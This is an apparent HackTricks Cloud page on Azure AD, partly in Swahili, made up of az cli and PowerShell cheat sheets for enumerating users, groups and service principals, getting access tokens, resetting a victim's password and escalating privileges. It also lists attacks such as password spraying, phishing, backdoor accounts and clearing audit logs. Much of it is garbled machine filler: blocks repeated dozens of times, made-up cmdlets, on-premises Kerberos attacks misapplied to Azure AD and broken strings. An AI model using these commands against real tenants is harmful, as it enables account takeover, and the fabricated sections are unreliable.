Az - AzureAD (AAD)

Jifunze kuhusu kuhack AWS kutoka mwanzo hadi mtaalamu na htARTE (Mtaalamu wa Timu Nyekundu ya AWS ya HackTricks)!

Njia nyingine za kusaidia HackTricks:

Ikiwa unataka kuona kampuni yako ikitangazwa kwenye HackTricks au kupakua HackTricks kwa PDF Angalia MIPANGO YA USAJILI!
Pata bidhaa rasmi za PEASS & HackTricks
Gundua Familia ya PEASS, mkusanyiko wetu wa NFTs ya kipekee
Jiunge na 💬 Kikundi cha Discord au kikundi cha telegram au tufuate kwenye Twitter 🐦 @hacktricks_live.
Shiriki mbinu zako za kuhack kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.

Taarifa Msingi

Azure Active Directory (Azure AD) ni huduma ya msingi ya wingu ya Microsoft kwa usimamizi wa kitambulisho na ufikiaji. Ni muhimu katika kuwezesha wafanyakazi kuingia na kupata rasilimali, ndani na nje ya shirika, ikiwemo Microsoft 365, lango la Azure, na programu nyingi za SaaS. Ubunifu wa Azure AD unazingatia kutoa huduma muhimu za kitambulisho, ikiwa ni pamoja na uthibitishaji, idhini, na usimamizi wa mtumiaji.

Sifa muhimu za Azure AD ni pamoja na uthibitishaji wa hatua nyingi na upatikanaji wa masharti, pamoja na ushirikiano wa moja kwa moja na huduma zingine za usalama za Microsoft. Sifa hizi zinaongeza sana usalama wa vitambulisho vya watumiaji na kuwawezesha mashirika kutekeleza na kusimamia sera zao za ufikiaji kwa ufanisi. Kama sehemu muhimu ya mfumo wa huduma za wingu za Microsoft, Azure AD ni muhimu kwa usimamizi wa watumiaji wa msingi wa wingu.

Entititi

Urambazaji

Kwa urambazaji huu unaweza kutumia zana ya az cli, moduli ya PowerShell AzureAD (au AzureAD Preview) na moduli ya Az PowerShell.

Kwenye linux utahitaji kusakinisha PowerShell Core:

sudo apt-get update
sudo apt-get install -y wget apt-transport-https software-properties-common

# Ubuntu 20.04
wget -q https://packages.microsoft.com/config/ubuntu/20.04/packages-microsoft-prod.deb

# Update repos
sudo apt-get update
sudo add-apt-repository universe

# Install & start powershell
sudo apt-get install -y powershell
pwsh

# Az cli
curl -sL https://aka.ms/InstallAzureCLIDeb | sudo bash

Tofauti za Moduli

AzureAD ni moduli ya PowerShell kutoka Microsoft kwa kusimamia Azure AD. Haioneshi mali zote za vitu vya Azure AD na haiwezi kutumika kupata habari za rasilimali za Azure.
Az PowerShell ni moduli kwa kusimamia rasilimali za Azure kutoka kwenye mstari wa amri wa PowerShell.

Unganisho

az login #This will open the browser
az login -u <username> -p <password> #Specify user and password
az login --identity #Use the current machine managed identity (metadata)
az login --identity -u /subscriptions/<subscriptionId>/resourcegroups/myRG/providers/Microsoft.ManagedIdentity/userAssignedIdentities/myID #Login with user managed identity
# Login as service principal
az login --service-principal -u http://azure-cli-2016-08-05-14-31-15 -p VerySecret --tenant contoso.onmicrosoft.com #With password
az login --service-principal -u http://azure-cli-2016-08-05-14-31-15 -p ~/mycertfile.pem --tenant contoso.onmicrosoft.com #With cert

# Request access token (ARM)
az account get-access-token
# Request access token for different resource. Supported tokens: aad-graph, arm, batch, data-lake, media, ms-graph, oss-rdbms
az account get-access-token --resource-type aad-graph

# If you want to configure some defaults
az configure

# Get user logged-in already
az ad signed-in-user show

# Help
az find "vm" # Find vm commands
az vm -h # Get subdomains
az ad user list --query-examples # Get examples

Connect-AzureAD #Open browser
# Using credentials
$passwd = ConvertTo-SecureString "Welcome2022!" -AsPlainText -Force
$creds = New-Object System.Management.Automation.PSCredential ("test@corp.onmicrosoft.com", $passwd)
Connect-AzureAD -Credential $creds

# Using tokens
## AzureAD cannot request tokens, but can use AADGraph and MSGraph tokens to connect
Connect-AzureAD -AccountId test@corp.onmicrosoft.com -AadAccessToken $token

Kwa kawaida, unaweza kutumia Az PowerShell kufanya kazi na Azure AD. Unaweza kufanya mambo kama vile kuongeza, kusasisha, au kufuta watumiaji, vikundi, na vitu vingine vya Azure AD. Unaweza pia kusimamia ruhusa za watumiaji na mengi zaidi.

Connect-AzAccount #Open browser
# Using credentials
$passwd = ConvertTo-SecureString "Welcome2022!" -AsPlainText -Force
$creds = New-Object System.Management.Automation.PSCredential("test@corp.onmicrosoft.com", $passwd)
Connect-AzAccount -Credential $creds

# Get Access Token
(Get-AzAccessToken).Token
# Request access token to other endpoints: AadGraph, AnalysisServices, Arm, Attestation, Batch, DataLake, KeyVault, MSGraph, OperationalInsights, ResourceManager, Storage, Synapse
Get-AzAccessToken -ResourceTypeName MSGraph
(Get-AzAccessToken -Resource "https://graph.microsoft.com").Token

# Conenct with access token
Connect-AzAccount -AccountId test@corp.onmicrosoft.com -AccessToken $token
Connect-AzAccount -AccessToken $token -GraphAccessToken $graphaccesstoken -AccountId <ACCOUNT-ID>
## The -AccessToken is from management.azure.com

# Connect with Service principal/enterprise app secret
$password = ConvertTo-SecureString 'KWEFNOIRFIPMWL.--DWPNVFI._EDWWEF_ADF~SODNFBWRBIF' -AsPlainText -Force
$creds = New-Object
System.Management.Automation.PSCredential('2923847f-fca2-a420-df10-a01928bec653', $password)
Connect-AzAccount -ServicePrincipal -Credential $creds -Tenant 29sd87e56-a192-a934-bca3-0398471ab4e7d

#All the Azure AD cmdlets have the format *-AzAD*
Get-Command *azad*
#Cmdlets for other Azure resources have the format *Az*
Get-Command *az*

#Using management
$Token = 'eyJ0eXAi..'
# List subscriptions
$URI = 'https://management.azure.com/subscriptions?api-version=2020-01-01'
$RequestParams = @{
Method  = 'GET'
Uri     = $URI
Headers = @{
'Authorization' = "Bearer $Token"
}
}
(Invoke-RestMethod @RequestParams).value

# Using graph
Invoke-WebRequest -Uri "https://graph.windows.net/myorganization/users?api-version=1.6" -Headers @{Authorization="Bearer {0}" -f $Token}

# Request tokens to access endpoints
# ARM
curl "$IDENTITY_ENDPOINT?resource=https://management.azure.com&api-version=2017-09-01" -H secret:$IDENTITY_HEADER

# Vault
curl "$IDENTITY_ENDPOINT?resource=https://vault.azure.net&api-version=2017-09-01" -H secret:$IDENTITY_HEADER

Wakati unapo ingia kupitia CLI kwenye Azure na programu yoyote, unatumia Azure Application kutoka kwa mpangaji ambao ni wa Microsoft. Programu hizi, kama zile unazoweza kuunda kwenye akaunti yako, ina client id. Hautaweza kuziona zote kwenye orodha za programu zilizoruhusiwa unazoweza kuona kwenye konsoli, lakini zinaruhusiwa kwa chaguo-msingi.

Kwa mfano, script ya powershell inayotumia programu yenye client id 1950a258-227b-4e31-a9cf-717495945fc2. Hata kama programu haionekani kwenye konsoli, msimamizi wa mfumo anaweza kuzuia programu hiyo ili watumiaji wasiweze kupata upatikanaji kwa kutumia zana zinazounganisha kupitia programu hiyo.

Hata hivyo, kuna client-ids nyingine za programu ambazo zitaruhusu uhusiano wako na Azure:

# The important part is the ClientId, which identifies the application to login inside Azure

$token = Invoke-Authorize -Credential $credential `
-ClientId '1dfb5f98-f363-4b0f-b63a-8d20ada1e62d' `
-Scope 'Files.Read.All openid profile Sites.Read.All User.Read email' `
-Redirect_Uri "https://graphtryit-staging.azurewebsites.net/" `
-Verbose -Debug `
-InformationAction Continue

$token = Invoke-Authorize -Credential $credential `
-ClientId '65611c08-af8c-46fc-ad20-1888eb1b70d9' `
-Scope 'openid profile Sites.Read.All User.Read email' `
-Redirect_Uri "chrome-extension://imjekgehfljppdblckcmjggcoboemlah" `
-Verbose -Debug `
-InformationAction Continue

$token = Invoke-Authorize -Credential $credential `
-ClientId 'd3ce4cf8-6810-442d-b42e-375e14710095' `
-Scope 'openid' `
-Redirect_Uri "https://graphexplorer.azurewebsites.net/" `
-Verbose -Debug `
-InformationAction Continue

Watumiaji

# Enumerate users
az ad user list --output table
az ad user list --query "[].userPrincipalName"
# Get info of 1 user
az ad user show --id "test@corp.onmicrosoft.com"
# Search "admin" users
az ad user list --query "[].displayName" | findstr /i "admin"
az ad user list --query "[?contains(displayName,'admin')].displayName"
# Search attributes containing the word "password"
az ad user list | findstr /i "password" | findstr /v "null,"
# All users from AzureAD
az ad user list --query "[].{osi:onPremisesSecurityIdentifier,upn:userPrincipalName}[?osi==null]"
az ad user list --query "[?onPremisesSecurityIdentifier==null].displayName"
# All users synced from on-prem
az ad user list --query "[].{osi:onPremisesSecurityIdentifier,upn:userPrincipalName}[?osi!=null]"
az ad user list --query "[?onPremisesSecurityIdentifier!=null].displayName"
# Get groups where the user is a member
az ad user get-member-groups --id <email>
# Get roles assigned to the user
az role assignment list --include-groups --include-classic-administrators true --assignee <email>

Azure AD

Enumeration

User Enumeration: Use the Graph API to enumerate users in the Azure AD tenant.
Group Enumeration: Use the Graph API to enumerate groups in the Azure AD tenant.
Application Enumeration: Use the Graph API to enumerate applications registered in the Azure AD tenant.
Service Principal Enumeration: Use the Graph API to enumerate service principals in the Azure AD tenant.
Device Enumeration: Use the Graph API to enumerate devices registered in the Azure AD tenant.

Exploitation

Password Spraying: Perform password spraying attacks against Azure AD accounts.
Phishing: Conduct phishing attacks to steal credentials of Azure AD users.
Brute Force: Perform brute force attacks against Azure AD accounts.
Token Impersonation: Exploit token impersonation vulnerabilities to escalate privileges in Azure AD.
Password Policies: Check for weak password policies in Azure AD.

Persistence

Backdoor Accounts: Create backdoor accounts in Azure AD for persistent access.
Application Consent: Abuse application consent to maintain access to Azure AD resources.
OAuth Token: Steal OAuth tokens to maintain persistent access to Azure AD.

Lateral Movement

Pass-the-Hash: Use pass-the-hash attacks to move laterally within Azure AD.
Pass-the-Ticket: Utilize pass-the-ticket attacks for lateral movement in Azure AD.
Golden Ticket: Forge golden tickets to move laterally within Azure AD.
Silver Ticket: Forge silver tickets to move laterally within Azurejson AD.

Exfiltration

Data Exfiltration: Exfiltrate sensitive data from Azure AD using various techniques.
Export Data: Export data from Azure AD using the Graph API for further analysis.

Covering Tracks

Audit Logs: Clear or modify audit logs to cover tracks in Azure AD.
Event Deletion: Delete events to hide malicious activities in Azure AD.

Other Techniques

Domain Fronting: Use domain fronting to bypass security controls in Azure AD.
Password Hashes: Steal and crack password hashes from Azure AD for further attacks.
Kerberoasting: Perform Kerberoasting attacks to compromise service accounts in Azure AD.

# Enumerate Users
Get-AzureADUser -All $true
Get-AzureADUser -All $true | select UserPrincipalName
# Get info of 1 user
Get-AzureADUser -ObjectId test@corp.onmicrosoft.com | fl
# Search "admin" users
Get-AzureADUser -SearchString "admin" #Search admin at the begining of DisplayName or userPrincipalName
Get-AzureADUser -All $true |?{$_.Displayname -match "admin"} #Search "admin" word in DisplayName
# Get all attributes of a user
Get-AzureADUser -ObjectId test@defcorphq.onmicrosoft.com|%{$_.PSObject.Properties.Name}
# Search attributes containing the word "password"
Get-AzureADUser -All $true |%{$Properties = $_;$Properties.PSObject.Properties.Name | % {if ($Properties.$_ -match 'password') {"$($Properties.UserPrincipalName) - $_ - $($Properties.$_)"}}}
# All users from AzureAD# All users from AzureAD
Get-AzureADUser -All $true | ?{$_.OnPremisesSecurityIdentifier -eq $null}
# All users synced from on-prem
Get-AzureADUser -All $true | ?{$_.OnPremisesSecurityIdentifier -ne $null}
# Objects created by a/any user
Get-AzureADUser [-ObjectId <email>] | Get-AzureADUserCreatedObject
# Devices owned by a user
Get-AzureADUserOwnedDevice -ObjectId test@corp.onmicrosoft.com
# Objects owned by a specific user
Get-AzureADUserOwnedObject -ObjectId test@corp.onmicrosoft.com
# Get groups & roles where the user is a member
Get-AzureADUserMembership -ObjectId 'test@corp.onmicrosoft.com'
# Get devices owned by a user
Get-AzureADUserOwnedDevice -ObjectId test@corp.onmicrosoft.com
# Get devices registered by a user
Get-AzureADUserRegisteredDevice -ObjectId test@defcorphq.onmicrosoft.com
# Apps where a user has a role (role not shown)
Get-AzureADUser -ObjectId roygcain@defcorphq.onmicrosoft.com | Get-AzureADUserAppRoleAssignment | fl *
# Get Administrative Units of a user
$userObj = Get-AzureADUser -Filter "UserPrincipalName eq 'bill@example.com'"
Get-AzureADMSAdministrativeUnit | where { Get-AzureADMSAdministrativeUnitMember -Id $_.Id | where { $_.Id -eq $userObj.ObjectId } }

Az PowerShell

Connect to Azure AD
```
Connect-AzAccount
```
List all users
```
Get-AzureADUser
```
List all groups
```
Get-AzureADGroup
```
List all applications
```
Get-AzureADApplication
```
List all service principals
```
Get-AzureADServicePrincipal
```
List all devices
```
Get-AzureADDevice
```
List all roles
```
Get-AzureADDirectoryRole
```
List all role assignments
```
Get-AzureADDirectoryRoleMember
```
List all role definitions
```
Get-AzureADDirectoryRoleTemplate
```
List all domain settings
```
Get-AzureADDomain
```
List all sign-ins
```
Get-AzureADAuditSignInLogs
```
List all sign-ins
```
Get-AzureADAuditSignInLogs
```
List all sign-ins
```
Get-AzureADAuditSignInLogs
```
List all sign-ins
```
Get-AzureADAuditSignInLogs
```
List all sign-ins
```
Get-AzureADAuditSignInLogs
```
List all sign-ins
```
Get-AzureADAuditSignInLogs
```
List all sign-ins
```
Get-AzureADAuditSignInLogs
```
List all sign-ins
```
Get-AzureADAuditSignInLogs
```
List all sign-ins
```
Get-AzureADAuditSignInLogs
```
List all sign-ins
```
Get-AzureADAuditSignInLogs
```

# Enumerate users
Get-AzADUser
# Get details of a user
Get-AzADUser -UserPrincipalName test@defcorphq.onmicrosoft.com
# Search user by string
Get-AzADUser -SearchString "admin" #Search at the beginnig of DisplayName
Get-AzADUser | ?{$_.Displayname -match "admin"}
# Get roles assigned to a user
Get-AzRoleAssignment -SignInName test@corp.onmicrosoft.com

Badilisha Nenosiri la Mtumiaji

$password = "ThisIsTheNewPassword.!123" | ConvertTo- SecureString -AsPlainText –Force

(Get-AzureADUser -All $true | ?{$_.UserPrincipalName -eq "victim@corp.onmicrosoft.com"}).ObjectId | Set- AzureADUserPassword -Password $password –Verbose

MFA & Sera za Upatikanaji wa Masharti

Inashauriwa sana kuongeza MFA kwa kila mtumiaji, hata hivyo, baadhi ya makampuni hawataweka au wanaweza kuweka na Sera ya Upatikanaji wa Masharti: Mtumiaji atahitaji MFA ikiwa ataingia kutoka eneo maalum, kivinjari au hali fulani. Sera hizi, ikiwa hazijasakinishwa kwa usahihi, zinaweza kuwa rahisi kupitishwa. Angalia:

pageAz - Conditional Access Policies / MFA Bypass

Vikundi

# Enumerate groups
az ad group list
az ad group list --query "[].[displayName]" -o table
# Get info of 1 group
az ad group show --group <group>
# Get "admin" groups
az ad group list --query "[].displayName" | findstr /i "admin"
az ad group list --query "[?contains(displayName,'admin')].displayName"
# All groups from AzureAD
az ad group list --query "[].{osi:onPremisesSecurityIdentifier,displayName:displayName,description:description}[?osi==null]"
az ad group list --query "[?onPremisesSecurityIdentifier==null].displayName"
# All groups synced from on-prem
az ad group list --query "[].{osi:onPremisesSecurityIdentifier,displayName:displayName,description:description}[?osi!=null]"
az ad group list --query "[?onPremisesSecurityIdentifier!=null].displayName"
# Get members of group
az ad group member list --group <group> --query "[].userPrincipalName" -o table
# Check if member of group
az ad group member check --group "VM Admins" --member-id <id>
# Get which groups a group is member of
az ad group get-member-groups -g "VM Admins"
# Get Apps where a group has a role (role not shown)
Get-AzureADGroup -ObjectId <id> | Get-AzureADGroupAppRoleAssignment | fl *

Azure AD

Enumeration

Get Tenant Info: az account show
List Subscriptions: az account list
Set Subscription: az account set --subscription <SUBSCRIPTION_ID>
List Azure AD Users: az ad user list
List Azure AD Groups: az ad group list
List Azure AD Service Principals: az ad sp list
List Azure AD Applications: az ad app list
List Azure AD Devices: az ad device list -json
Get Azure AD User: az ad user show --id <USER_ID>
Get Azure AD Group: az ad group show --group <GROUP_ID>
Get Azure AD Service Principal: az ad sp show --id <SP_ID>
Get Azure AD Application: az ad app show --id <APP_ID>
Get Azure AD Device: az ad device show --id <DEVICE_ID>

Dumping

Dump Azure AD Users: az ad user list --query "[].{userPrincipalName:userPrincipalName, objectId:objectId}"
Dump Azure AD Groups: az ad group list --query "[].{displayName:displayName, objectId:objectid}"
Dump Azure AD Service Principals: az ad sp list --query "[].{displayName:displayName, objectId:objectId}"
Dump Azure AD Applications: az ad app list --query "[].{displayName:displayName, appId (appId)}"
Dump Azure AD Devices: az ad device list --query "[].{displayName:json"

Brute Force

Brute Force Azure AD Account: az ad user list --query "[].userPrincipalName" | xargs -I % az ad user get-member-groups --upn %

Privilege Escalation

Add User to Azure AD Group: az ad group member add --group <GROUP_ID> --member-id <USER_ID>
Add User to Azure AD Role: az role assignment create --assignee <USER_ID> --role <ROLE_NAME> --scope /
Add User to Azure AD Application: az ad app owner add --id <APP_ID> --owner-object-id <USER_ID>json

Persistence

Create Azure AD Application: az ad app create --display-name <APP_NAME> --homepage <URL> --identifier-uris <URI>
Create Azure AD Service Principal: az ad sp create --id <APP_ID>
Create Azure AD Group: az ad group create --display-name <GROUP_NAME>

Lateral Movement

List Azure AD Group Members: az ad group member list --group <GROUP_ID>
List Azure AD Group Owners: az ad group owner list --group <GROUP_ID>
List Azure AD Group Memberships: az ad user get-member-groups --upn <USER_PRINCIPjson

Exfiltration

Export Azure AD Users: az ad user list --query "[].{userPrincipalName:userPrincipalName, objectId:objectId}" --output table
Export Azure AD Groups: az ad group list --query "[].{displayName:displayName, objectId:objectId}" --output table
Export Azure AD Service Principals: az ad sp list --query "[].{displayName:displayName, objectId:objectId}" --output table
Export Azure AD Applications: az ad app list --query "[].{displayName:displayName, appId (appId)}" --output table
Export Azure AD Devices: az ad device list --query "[].{displayName:json" --output table

```powershell # Enumerate Groups Get-AzureADGroup -All $true # Get info of 1 group Get-AzADGroup -DisplayName | fl # Get "admin" groups Get-AzureADGroup -SearchString "admin" | fl #Groups starting by "admin" Get-AzureADGroup -All $true |?{$_.Displayname -match "admin"} #Groups with the word "admin" # Get groups allowing dynamic membership Get-AzureADMSGroup | ?{$_.GroupTypes -eq 'DynamicMembership'} # All groups that are from Azure AD Get-AzureADGroup -All $true | ?{$_.OnPremisesSecurityIdentifier -eq $null} # All groups that are synced from on-prem (note that security groups are not synced) Get-AzureADGroup -All $true | ?{$_.OnPremisesSecurityIdentifier -ne $null} # Get members of a group Get-AzureADGroupMember -ObjectId # Get roles of group Get-AzureADMSGroup -SearchString "Contoso_Helpdesk_Administrators" #Get group id Get-AzureADMSRoleAssignment -Filter "principalId eq '69584002-b4d1-4055-9c94-320542efd653'" # Get Administrative Units of a group $groupObj = Get-AzureADGroup -Filter "displayname eq 'TestGroup'" Get-AzureADMSAdministrativeUnit | where { Get-AzureADMSAdministrativeUnitMember -Id $_.Id | where {$_.Id -eq $groupObj.ObjectId} } ```

Az PowerShell

Connect to Azure AD
```
Connect-AzAccount
```
List all users
```
Get-AzADUser
```
List all groups
```
Get-AzADGroup
```
List all applications
```
Get-AzADApplication
```
List all service principals
```
Get-AzADServicePrincipal
```
List all devices
```
Get-AzADDevice
```
List all role assignments
```
Get-AzRoleAssignment
```
List all role definitions
```
Get-AzRoleDefinition
```

List all role assignments for a specific user

Get-AzRoleAssignment -SignInName user@example.com

List all role assignments for a specific group

Get-AzRoleAssignment -ObjectId <group_object_id>

List all role assignments for a specific application
```
Get-AzRoleAssignment -ApplicationId <application_id>
```

List all role assignments for a specific service principal

Get-AzRoleAssignment -ServicePrincipalName <service_principal_name>

List all role assignments for a specific device

Get-AzRoleAssignment -ObjectId <device_object_id>

List all role assignments for a specific resource group

Get-AzRoleAssignment -ResourceGroupName <resource_group_name>

List all role assignments for a specific subscription

Get-AAzRoleAssignment -Scope /subscriptions/<subscription_id>

List all role assignments for a specific management group

Get-AzRoleAssignment -Scope /providers/Microsoft.Management/managementGroups/<management_group_id>

List all role assignments for a specific resource

Get-AzRoleAssignment -ResourceName <resource_name> -ResourceType <resource_type>

List all role assignments for a specific role definition

Get-AzRoleAssignment -RoleDefinitionName <role_definition_name>

# Get all groups
Get-AzADGroup
# Get details of a group
Get-AzADGroup -ObjectId <id>
# Search group by string
Get-AzADGroup -SearchString "admin" | fl * #Search at the beginnig of DisplayName
Get-AzADGroup |?{$_.Displayname -match "admin"}
# Get members of group
Get-AzADGroupMember -GroupDisplayName <resource_group_name>
# Get roles of group
Get-AzRoleAssignment -ResourceGroupName <resource_group_name>

Ongeza mtumiaji kwa kikundi

Wamiliki wa kikundi wanaweza kuongeza watumiaji wapya kwenye kikundi

Add-AzureADGroupMember -ObjectId <group_id> -RefObjectId <user_id> -Verbose

Vikundi vinaweza kuwa vya kudumu, ambavyo kimsingi inamaanisha kwamba ikiwa mtumiaji anatimiza masharti fulani atapewa kikundi. Bila shaka, ikiwa masharti yanategemea sifa ambazo mtumiaji anaweza kudhibiti, anaweza kutumia kipengele hiki kuingia katika vikundi vingine. Angalia jinsi ya kutumia vibaya vikundi vya kudumu kwenye ukurasa ufuatao:

pageAz - Dynamic Groups Privesc

Service Principals / Enterprise Applications

Tafadhali kumbuka kwamba Service Principal katika lugha ya PowerShell inaitwa Enterprise Applications kwenye Azure portal (wavuti).

# Get Service Principals
az ad sp list --all
az ad sp list --all --query "[].[displayName]" -o table
# Get details of one SP
az ad sp show --id 00000000-0000-0000-0000-000000000000
# Search SP by string
az ad sp list --all --query "[?contains(displayName,'app')].displayName"
# Get owner of service principal
az ad sp owner list --id <id> --query "[].[displayName]" -o table
# Get service principals owned by the current user
az ad sp list --show-mine
# List apps that have password credentials
az ad sp list --all --query "[?passwordCredentials != null].displayName"
# List apps that have key credentials (use of certificate authentication)
az ad sp list -all --query "[?keyCredentials != null].displayName"

Azure AD

Enumeration

Get Tenant Information
- Description: Retrieve information about the Azure AD tenant.
- Command: az account show
- Useful for: Understanding the Azure AD tenant configuration.
List Users
- Description: List all users in the Azure AD tenant.
- Command: az ad user list
- Useful for: Gathering information about users in the Azure AD tenant.
List Groups
- Description: List all groups in the Azure AD tenant.
- Command: az ad group list
- Useful for: Understanding the group structure in the Azure AD tenant.
List Service Principals
- Description: List all service principals in the Azure AD tenant.
- Command: az ad sp list
- Useful for: Identifying service principals in the Azure AD tenant.
List Applications
- Description: List all applications in the Azure AD tenant.
- Command: az ad app list
- Useful for: Understanding the applications registered in the Azure AD tenant.
List Domains
- Description: List all domains in the Azure AD tenant.
- Command: az ad domain list
- Useful for: Identifying domains associated with the Azure AD tenant.
List Role Assignments
- Description: List all role assignments in the Azure AD tenant.
- Command: az role assignment list
- Useful for: Understanding the role assignments within the Azure AD tenant.

Exploitation

Brute Force
- Description: Attempt to guess user passwords through brute force attacks.
- Tools: Hydra, CrackMapExec, etc.
- Useful for: Gaining unauthorized access to user accounts.
Password Spraying
- Description: Test a few common passwords against multiple accounts to avoid account lockouts.
- Tools: SprayingToolkit, etc.
- Useful for: Identifying weak passwords in the Azure AD tenant.
Phishing
- Description: Trick users into revealing their credentials through fake login pages or emails.
- Tools: GoPhish, Evilginx, etc.
- Useful for: Stealing user credentials for unauthorized access.
Token Impersonation
- Description: Obtain and use a user's token to impersonate that user.
- Tools: Rubeus, Impacket, etc.
- Useful for: Escalating privileges within the Azure AD tenant.
Password Hash Dumping
- Description: Extract password hashes from the Azure AD tenant for offline cracking.
- Tools: Mimikatz, secretsdump.py, etc.
- Useful for: Cracking passwords and gaining unauthorized access.
Golden Ticket Attack
- Description: Forge Kerberos tickets to gain unauthorized access to resources.
- Tools: Mimikatz, Kekeo, etc.
- Useful for: Persistently accessing resources in the Azure AD tenant.
Pass-the-Ticket Attack
- Description: Pass forged Kerberos tickets to access resources without knowing the password.
- Tools: Mimikatz, Impacket, etc.
- Useful for: Moving laterally within the Azure AD tenant.
DCSync Attack
- Description: Simulate a Domain Controller to request password data from the Azure AD.
- Tools: Mimikatz, secretsdump.py, etc.
- Useful for: Extracting password data for further attacks.

# Get Service Principals
Get-AzureADServicePrincipal -All $true
# Get details about a SP
Get-AzureADServicePrincipal -ObjectId <id> | fl *
# Get SP by string name or Id
Get-AzureADServicePrincipal -All $true | ?{$_.DisplayName -match "app"} | fl
Get-AzureADServicePrincipal -All $true | ?{$_.AppId -match "103947652-1234-5834-103846517389"}
# Get owner of SP
Get-AzureADServicePrincipal -ObjectId <id> | Get-AzureADServicePrincipalOwner |fl *
# Get objects owned by a SP
Get-AzureADServicePrincipal -ObjectId <id> | Get-AzureADServicePrincipalOwnedObject
# Get objects created by a SP
Get-AzureADServicePrincipal -ObjectId <id> | Get-AzureADServicePrincipalCreatedObject
# Get groups where the SP is a member
Get-AzureADServicePrincipal | Get-AzureADServicePrincipalMembership
Get-AzureADServicePrincipal -ObjectId <id> | Get-AzureADServicePrincipalMembership |fl *

Az PowerShell

Enumerate Azure AD

Install Az PowerShell Module

Install-Module -Name Az -AllowClobber -Scope CurrentUser

Connect to Azure AD
```
Connect-AzAccount
```
List Azure AD Users
```
Get-AzADUser
```
List Azure AD Groups
```
Get-AzADGroup
```
List Azure AD Applications
```
Get-AzADApplication
```
List Azure AD Service Principals
```
Get-AzADServicePrincipal
```
List Azure AD Devices
```
Get-AzADDevice
```
List Azure AD Domains
```
Get-AzADDomain
```
List Azure AD Directory Roles
```
Get-AzADDirectoryRole
```
List Azure AD Directory Role Members
```
Get-AzADDirectoryRoleMember
```
List Azure AD Directory Role Templates
```
Get-AzADDirectoryRoleTemplate
```
List Azure AD Directory Role Template Members
```
Get-AzADDirectoryRoleTemplateMember
```
List Azure AD Directory Role Definitions
```
Get-AzADDirectoryRoleDefinition
```
List Azure AD Directory Role Definition Members
```
Get-AzADDirectoryRoleDefinitionMember
```
List Azure AD Directory Role Scope Members
```
Get-AzADDirectoryRoleScopeMember
```
List Azure AD Directory Role Scopes
```
Get-AzADDirectoryRoleScope
```
List Azure AD Directory Role Scope Members
```
Get-AzADDirectoryRoleScopeMember
```
List Azure AD Directory Role Scopes
```
Get-AzADDirectoryRoleScope
```
List Azure AD Directory Role Scope Members
```
Get-AzADDirectoryRoleScopeMember
```
List Azure AD Directory Role Scopes
```
Get-AzADDirectoryRoleScope
```
List Azure AD Directory Role Scope Members
```
Get-AzADDirectoryRoleScopeMember
```
List Azure AD Directory Role Scopes
```
Get-AzADDirectoryRoleScope
```
List Azure AD Directory Role Scope Members
```
Get-AzADDirectoryRoleScopeMember
```
List Azure AD Directory Role Scopes
```
Get-AzADDirectoryRoleScope
```
List Azure AD Directory Role Scope Members
```
Get-AzADDirectoryRoleScopeMember
```
List Azure AD Directory Role Scopes
```
Get-AzADDirectoryRoleScope
```
List Azure AD Directory Role Scope Members
```
Get-AzADDirectoryRoleScopeMember
```
List Azure AD Directory Role Scopes
```
Get-AzADDirectoryRoleScope
```
List Azure AD Directory Role Scope Members
```
Get-AzADDirectoryRoleScopeMember
```
List Azure AD Directory Role Scopes
```
Get-AzADDirectoryRoleScope
```
List Azure AD Directory Role Scope Members
```
Get-AzADDirectoryRoleScopeMember
```
List Azure AD Directory Role Scopes
```
Get-AzADDirectoryRoleScope
```
List Azure AD Directory Role Scope Members
```
Get-AzADDirectoryRoleScopeMember
```
List Azure AD Directory Role Scopes
```
Get-AzADDirectoryRoleScope
```
List Azure AD Directory Role Scope Members
```
Get-AzADDirectoryRoleScopeMember
```
List Azure AD Directory Role Scopes
```
Get-AzADDirectoryRoleScope
```
List Azure AD Directory Role Scope Members
```
Get-AzADDirectoryRoleScopeMember
```
List Azure AD Directory Role Scopes
```
Get-AzADDirectoryRoleScope
```
List Azure AD Directory Role Scope Members
```
Get-AzADDirectoryRoleScopeMember
```
List Azure AD Directory Role Scopes
```
Get-AzADDirectoryRoleScope
```
List Azure AD Directory Role Scope Members
```
Get-AzADDirectoryRoleScopeMember
```
List Azure AD Directory Role Scopes
```
Get-AzADDirectoryRoleScope
```
List Azure AD Directory Role Scope Members
```
Get-AzADDirectoryRoleScopeMember
```
List Azure AD Directory Role Scopes
```
Get-AzADDirectoryRoleScope
```
List Azure AD Directory Role Scope Members
```
Get-AzADDirectoryRoleScopeMember
```
List Azure AD Directory Role Scopes
```
Get-AzADDirectoryRoleScope
```
List Azure AD Directory Role Scope Members
```
Get-AzADDirectoryRoleScopeMember
```
List Azure AD Directory Role Scopes
```
Get-AzADDirectoryRoleScope
```
List Azure AD Directory Role Scope Members
```
Get-AzADDirectoryRoleScopeMember
```
List Azure AD Directory Role Scopes
```
Get-AzADDirectoryRoleScope
```
List Azure AD Directory Role Scope Members
```
Get-AzADDirectoryRoleScopeMember
```
List Azure AD Directory Role Scopes
```
Get-AzADDirectoryRoleScope
```
List Azure AD Directory Role Scope Members
```
Get-AzADDirectoryRoleScopeMember
```
List Azure AD Directory Role Scopes
```
Get-AzADDirectoryRoleScope
```
List Azure AD Directory Role Scope Members
```
Get-AzADDirectoryRoleScopeMember
```
List Azure AD Directory Role Scopes
```
Get-AzADDirectoryRoleScope
```
List Azure AD Directory Role Scope Members
```
Get-AzADDirectoryRoleScopeMember
```
List Azure AD Directory Role Scopes
```
Get-AzADDirectoryRoleScope
```
List Azure AD Directory Role Scope Members
```
Get-AzADDirectoryRoleScopeMember
```
List Azure AD Directory Role Scopes
```
Get-AzADDirectoryRoleScope
```
List Azure AD Directory Role Scope Members
```
Get-AzADDirectoryRoleScopeMember
```
List Azure AD Directory Role Scopes
```
Get-AzADDirectoryRoleScope
```
List Azure AD Directory Role Scope Members
```
Get-AzADDirectoryRoleScopeMember
```
List Azure AD Directory Role Scopes
```
Get-AzADDirectoryRoleScope
```
List Azure AD Directory Role Scope Members
```
Get-AzADDirectoryRoleScopeMember
```
List Azure AD Directory Role Scopes
```
Get-AzADDirectoryRoleScope
```
List Azure AD Directory Role Scope Members
```
Get-AzADDirectoryRoleScopeMember
```
List Azure AD Directory Role Scopes
```
Get-AzADDirectoryRoleScope
```
List Azure AD Directory Role Scope Members
```
Get-AzADDirectoryRoleScopeMember
```
List Azure AD Directory Role Scopes
```
Get-AzADDirectoryRoleScope
```
List Azure AD Directory Role Scope Members
```
Get-AzADDirectoryRoleScopeMember
```
List Azure AD Directory Role Scopes
```
Get-AzADDirectoryRoleScope
```
